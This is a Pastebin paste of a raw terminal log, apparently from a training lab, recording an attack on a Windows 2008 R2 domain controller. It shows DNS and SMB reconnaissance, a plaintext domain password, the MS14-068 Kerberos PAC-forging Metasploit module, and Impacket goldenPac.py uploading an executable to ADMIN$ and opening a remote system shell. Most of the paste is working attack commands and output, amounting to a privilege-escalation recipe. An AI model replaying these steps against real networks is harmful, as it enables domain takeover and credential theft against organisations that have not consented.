API tools faq
paste
Advertisement
Guest User

Untitled

a guest
Nov 9th, 2018
240
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 8.25 KB | None | 0 0
raw download clone embed print report
  1. C:\Users\Admin\Desktop\Confidential data>type dns.contoso-west.org
  2. type dns.contoso-west.org
  3. > ls -d contoso-west.org
  4.  
  5. ...
  6. [dc2008r2-group1.contoso-west.org]
  7. dc2008r2-group1 A 10.0.0.149
  8. dcslave2008-group1 A 10.0.0.148
  9. DomainDnsZones A 10.0.0.149
  10. ...
  11.  
  12.  
  13. msf auxiliary(smb_version) > set RHOSTS 10.0.0.149
  14. RHOSTS => 10.0.0.149
  15. msf auxiliary(smb_version) > run
  16.  
  17. [+] 10.0.0.149:445 - Host is running Windows 2008 R2 Standard SP1 (build:7601) (name:DC2008R2-GROUP1) (domain:CONTOSO-WEST)
  18. [*] Scanned 1 of 1 hosts (100% complete)
  19. [*] Auxiliary module execution completed
  20.  
  21.  
  22. proxychains net rpc -W contoso-west.org -U blot -S 10.0.0.149 shell
  23. ProxyChains-3.1 (http://proxychains.sf.net)
  24. Enter blot's password: Bl0tt12309-
  25. |S-chain|-<>-127.0.0.1:1099-<><>-10.0.0.149:445-<><>-OK
  26. Talking to domain CONTOSO-WEST (S-1-5-21-3039018489-1111549232-2925702125)
  27. net rpc> user
  28. net rpc user> show
  29. Usage: net rpc user show <username>
  30. net rpc user show failed: NT_STATUS_INVALID_PARAMETER
  31. net rpc user> show blot
  32. user rid: 1109, group rid: 513
  33. net rpc user> packet_write_wait: Connection to 2001:700:300:7::85 port 22: Broken pipe
  34.  
  35.  
  36. auxiliary/admin/kerberos/ms14_068_kerberos_checksum
  37.  
  38.  
  39. msf auxiliary(ms14_068_kerberos_checksum) > show info
  40.  
  41. Name: MS14-068 Microsoft Kerberos Checksum Validation Vulnerability
  42. Module: auxiliary/admin/kerberos/ms14_068_kerberos_checksum
  43. License: Metasploit Framework License (BSD)
  44. Rank: Normal
  45. Disclosed: 2014-11-18
  46.  
  47. Provided by:
  48. Tom Maddock
  49. Sylvain Monne
  50. juan vazquez <juan.vazquez@metasploit.com>
  51.  
  52. Basic options:
  53. Name Current Setting Required Description
  54. ---- --------------- -------- -----------
  55. DOMAIN yes The Domain (upper case) Ex: DEMO.LOCAL
  56. PASSWORD yes The Domain User password
  57. RHOST yes The target address
  58. RPORT 88 yes The target port
  59. Timeout 10 yes The TCP timeout to establish connection and read data
  60. USER yes The Domain User
  61. USER_SID yes The Domain User SID, Ex: S-1-5-21-1755879683-3641577184-3486455962-1000
  62.  
  63. Description:
  64. This module exploits a vulnerability in the Microsoft Kerberos
  65. implementation. The problem exists in the verification of the
  66. Privilege Attribute Certificate (PAC) from a Kerberos TGS request,
  67. where a domain user may forge a PAC with arbitrary privileges,
  68. including Domain Administrator. This module requests a TGT ticket
  69. with a forged PAC and exports it to a MIT Kerberos Credential Cache
  70. file. It can be loaded on Windows systems with the Mimikatz help. It
  71. has been tested successfully on Windows 2008.
  72.  
  73. References:
  74. https://cvedetails.com/cve/CVE-2014-6324/
  75. https://technet.microsoft.com/en-us/library/security/MS14-068
  76. OSVDB (114751)
  77. http://blogs.technet.com/b/srd/archive/2014/11/18/additional-information-about-cve-2014-6324.aspx
  78. https://labs.mwrinfosecurity.com/blog/2014/12/16/digging-into-ms14-068-exploitation-and-defence/
  79. https://github.com/bidord/pykek
  80. https://community.rapid7.com/community/metasploit/blog/2014/12/25/12-days-of-haxmas-ms14-068-now-in-metasploit
  81.  
  82.  
  83.  
  84. msf auxiliary(ms14_068_kerberos_checksum) > set DOMAIN contoso-west.org
  85. DOMAIN => CONTOSO-WEST
  86. msf auxiliary(ms14_068_kerberos_checksum) > set RHOST 10.0.0.149
  87. RHOST => 10.0.0.149
  88. msf auxiliary(ms14_068_kerberos_checksum) > set USER blot
  89. USER => blot
  90. msf auxiliary(ms14_068_kerberos_checksum) > set user_sid S-1-5-21-3039018489-1111549232-2925702125-1109
  91. user_sid => S-1-5-21-3039018489-1111549232-2925702125-1109
  92. msf auxiliary(ms14_068_kerberos_checksum) > set PASSWORD Bl0tt12309-
  93. msf auxiliary(ms14_068_kerberos_checksum) > show options
  94.  
  95. Module options (auxiliary/admin/kerberos/ms14_068_kerberos_checksum):
  96.  
  97. Name Current Setting Required Description
  98. ---- --------------- -------- -----------
  99. DOMAIN contoso-west.org yes The Domain (upper case) Ex: DEMO.LOCAL
  100. PASSWORD Bl0tt12309- yes The Domain User password
  101. RHOST 10.0.0.149 yes The target address
  102. RPORT 88 yes The target port
  103. Timeout 10 yes The TCP timeout to establish connection and read data
  104. USER blot yes The Domain User
  105. USER_SID S-1-5-21-3039018489-1111549232-2925702125-1109 yes The Domain User SID, Ex: S-1-5-21-1755879683-3641577184-3486455962-1000
  106.  
  107.  
  108. msf auxiliary(ms14_068_kerberos_checksum) > run
  109.  
  110. [*] Validating options...
  111. [*] Using domain CONTOSO-WEST.ORG...
  112. [*] 10.0.0.149:88 - Sending AS-REQ...
  113. [*] 10.0.0.149:88 - Parsing AS-REP...
  114. [*] 10.0.0.149:88 - Sending TGS-REQ...
  115. [+] 10.0.0.149:88 - Valid TGS-Response, extracting credentials...
  116. [+] 10.0.0.149:88 - MIT Credential Cache saved on /root/.msf4/loot/20181109211513_default_10.0.0.149_windows.kerberos_173395.bin
  117. [*] Auxiliary module execution completed
  118.  
  119. root@10-kali2-group10:~/.msf4/loot# ls
  120. 20181010173151_default_192.168.40.14_192.168.40.14_ce_775643.crt
  121. 20181010173151_default_192.168.40.14_192.168.40.14_ke_958653.key
  122. 20181010173151_default_192.168.40.14_192.168.40.14_pe_462147.pem
  123. 20181109211513_default_10.0.0.149_windows.kerberos_173395.bin
  124. root@10-kali2-group10:~/.msf4/loot#
  125.  
  126.  
  127. To use this ticket, which is in the Credential Cache (ccache) format, we need to move it to the /tmp directory where the Kerberos tools look for tickets
  128.  
  129. root@10-kali2-group10:~/.msf4/loot# mv 20181109211513_default_10.0.0.149_windows.kerberos_173395.bin /tmp/krb5cc
  130.  
  131.  
  132.  
  133.  
  134. Modified the nano /etc/krb5.conf
  135. added: [realms]
  136. CONTOSO-WEST.ORG = {
  137. kdc = dc2008r2-group1
  138. admin_server = dc2008r2-group1
  139. default_domain = CONTOSO-WEST
  140. }
  141. [domain_realm]
  142. .contoso-west = CONTOSO-WEST.org
  143. contoso-west = CONTOSO-WEST.org
  144.  
  145.  
  146. proxychains python2.7 examples/goldenPac.py -dc-ip 10.0.0.149 -target-ip 10.0.0.149 CONTOSO-WEST.org/Blot@dc2008r2-group1.CONTOSO-WEST.org
  147. ProxyChains-3.1 (http://proxychains.sf.net)
  148. Impacket v0.9.18-dev - Copyright 2018 SecureAuth Corporation
  149.  
  150. Password:Bl0tt12309-
  151. |S-chain|-<>-127.0.0.1:1099-<><>-10.0.0.149:445-<><>-OK
  152. [*] User SID: S-1-5-21-3039018489-1111549232-2925702125-1109
  153. |S-chain|-<>-127.0.0.1:1099-<><>-10.0.0.149:445-<><>-OK
  154. |DNS-request| contoso-west.org
  155. |S-chain|-<>-127.0.0.1:1099-<><>-4.2.2.2:53-<><>-OK
  156. |DNS-response|: contoso-west.org does not exist
  157. [-] Couldn't get forest info ([Errno Connection error (contoso-west.org:445)] [Errno 1] Unknown error), continuing
  158. [*] Attacking domain controller 10.0.0.149
  159. |S-chain|-<>-127.0.0.1:1099-<><>-10.0.0.149:88-<><>-OK
  160. |S-chain|-<>-127.0.0.1:1099-<><>-10.0.0.149:88-<><>-OK
  161. |S-chain|-<>-127.0.0.1:1099-<><>-10.0.0.149:88-<><>-OK
  162. |S-chain|-<>-127.0.0.1:1099-<><>-10.0.0.149:88-<><>-OK
  163. [*] 10.0.0.149 found vulnerable!
  164. |S-chain|-<>-127.0.0.1:1099-<><>-10.0.0.149:445-<><>-OK
  165. [*] Requesting shares on 10.0.0.149.....
  166. [*] Found writable share ADMIN$
  167. [*] Uploading file UApVHfro.exe
  168. [*] Opening SVCManager on 10.0.0.149.....
  169. [*] Creating service TGOJ on 10.0.0.149.....
  170. [*] Starting service TGOJ.....
  171. |S-chain|-<>-127.0.0.1:1099-<><>-10.0.0.149:445-<><>-OK
  172. |S-chain|-<>-127.0.0.1:1099-<><>-10.0.0.149:445-<><>-OK
  173. [!] Press help for extra shell commands
  174. |S-chain|-<>-127.0.0.1:1099-<><>-10.0.0.149:445-<><>-OK
  175. Microsoft Windows [Version 6.1.7601]
  176. Copyright (c) 2009 Microsoft Corporation. All rights reserved.
  177.  
  178. C:\Windows\system32>ipconfig
  179.  
  180. Windows IP Configuration
  181.  
  182.  
  183. Ethernet adapter Local Area Connection:
  184.  
  185. Connection-specific DNS Suffix . :
  186. IPv4 Address. . . . . . . . . . . : 10.0.0.149
  187. Subnet Mask . . . . . . . . . . . : 255.255.255.240
  188. Default Gateway . . . . . . . . . : 10.0.0.145
  189.  
  190. Tunnel adapter isatap.{E58D4114-3C3A-46FD-AEAD-ECA142ED8636}:
  191.  
  192. Media State . . . . . . . . . . . : Media disconnected
  193. Connection-specific DNS Suffix . :
  194.  
  195. C:\Windows\system32>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!